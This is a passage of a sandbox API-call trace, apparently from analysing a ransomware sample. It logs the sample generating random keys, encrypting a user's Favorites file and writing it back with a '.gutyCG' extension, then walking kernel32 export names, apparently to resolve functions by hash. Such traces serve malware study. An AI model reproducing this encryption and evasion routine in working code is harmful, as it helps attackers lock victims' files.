lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" [0185.530] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpString2="Microsoft At Work.url.gutyCG" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url.gutyCG") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url.gutyCG" [0185.530] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.531] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url.gutyCG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url.gutycg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0185.531] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=397) returned 1 [0185.531] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0185.531] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.531] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x20, pbBuffer=0x750000 | out: pbBuffer=0x750000) returned 1 [0185.531] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x8, pbBuffer=0x750020 | out: pbBuffer=0x750020) returned 1 [0185.531] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0185.532] CryptEncrypt (in: hKey=0x479638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8b0000*, pdwDataLen=0x36fe190*=0x28, dwBufLen=0x100 | out: pbData=0x8b0000*, pdwDataLen=0x36fe190*=0x100) returned 1 [0185.532] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x8c0000 [0185.532] VirtualFree (lpAddress=0x8c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.533] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.533] CloseHandle (hObject=0x268) returned 1 [0185.533] SetFilePointerEx (in: hFile=0x264, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0185.533] WriteFile (in: hFile=0x264, lpBuffer=0x8b0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x36fe1b0, lpOverlapped=0x0 | out: lpBuffer=0x8b0000*, lpNumberOfBytesWritten=0x36fe1b0*=0x108, lpOverlapped=0x0) returned 1 [0185.534] CloseHandle (hObject=0x0) returned 0 [0185.534] CloseHandle (hObject=0x264) returned 1 [0185.534] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.534] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.534] GetTickCount () returned 0x11359f3 [0185.534] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.534] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0185.535] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x8a0000 [0185.535] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0185.535] lstrlenA (lpString="kernel32.dll") returned 12 [0185.535] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0185.535] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0185.535] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0185.535] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0185.535] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0185.535] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0185.535] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0185.535] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0185.535] lstrlenA (lpString="ADDATOMA") returned 8 [0185.535] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0185.535] lstrlenA (lpString="ADDATOMW") returned 8 [0185.535] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0185.535] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0185.535] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0185.535] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0185.535] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0185.535] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0185.535] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0185.536] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0185.536] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0185.536] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0185.536] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0185.536] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0185.536] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0185.536] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0185.536] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0185.536] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0185.536] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0185.536] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0185.536] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0185.536] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0185.536] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0185.536] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0185.536] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0185.536] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0185.536] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0185.536] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0185.536] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0185.536] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0185.536] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0185.536] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0185.536] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0185.536] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0185.536] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0185.536] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0185.536] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0185.536] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0185.536] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0185.536] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0185.536] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0185.536] lstrlenA (lpString="BACKUPREAD") returned 10 [0185.536] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0185.536] lstrlenA (lpString="BACKUPSEEK") returned 10 [0185.536] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0185.537] lstrlenA (lpString="BACKUPWRITE") returned 11 [0185.537] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0185.537] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0185.537] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0185.537] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0185.537] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0185.537] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0185.537] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0185.537] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0185.537] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0185.537] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0185.537] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0185.537] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0185.537] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0185.537] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0185.537] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0185.537] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0185.537] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0185.537] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0185.537] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0185.537] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0185.537] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0185.537] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0185.537] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0185.537] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0185.537] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0185.537] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0185.537] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0185.537] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0185.537] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0185.537] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0185.537] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0185.537] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0185.537] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0185.537] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0185.537] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0185.538] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0185.538] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0185.538] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0185.538] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0185.538] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0185.538] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0185.538] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0185.538] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0185.538] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0185.538] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0185.538] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0185.538] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0185.538] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0185.538] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0185.538] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0185.538] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0185.538] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0185.538] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0185.538] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0185.538] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0185.538] lstrlenA (lpString="BEEP") returned 4 [0185.538] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0185.538] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0185.538] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0185.538] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0185.538] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0185.538] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0185.538] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0185.538] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0185.538] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0185.538] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0185.538] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0185.538] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0185.538] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0185.538] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0185.538] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0185.538] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0185.539] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0185.539] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0185.539] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0185.539] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0185.539] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0185.539] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0185.539] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0185.539] lstrlenA (lpString="CANCELIO") returned 8 [0185.539] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0185.539] lstrlenA (lpString="CANCELIOEX") returned 10 [0185.539] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0185.539] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0185.539] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0185.539] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0185.539] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0185.539] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0185.539] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0185.539] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0185.539] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0185.539] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0185.539] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0185.539] lstrlenA (lpString="CHECKELEVATION") returned 14 [0185.539] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0185.539] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0185.539] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0185.539] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0185.539] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0185.539] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0185.539] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0185.539] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0185.539] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0185.539] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0185.539] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0185.539] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0185.539] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0185.539] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0185.540] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0185.540] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0185.540] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0185.540] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0185.540] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0185.540] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0185.540] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0185.540] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0185.540] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0185.540] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0185.540] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0185.540] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0185.540] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0185.540] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0185.540] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0185.540] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0185.540] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0185.540] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0185.540] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0185.540] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0185.540] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0185.540] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0185.540] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0185.540] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0185.540] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0185.540] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0185.540] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0185.540] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0185.540] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0185.540] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0185.540] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0185.540] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0185.540] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0185.540] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0185.540] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0185.540] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0185.540] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0185.541] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0185.541] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0185.541] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0185.541] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0185.541] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0185.541] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0185.541] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0185.541] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0185.541] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0185.541] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") 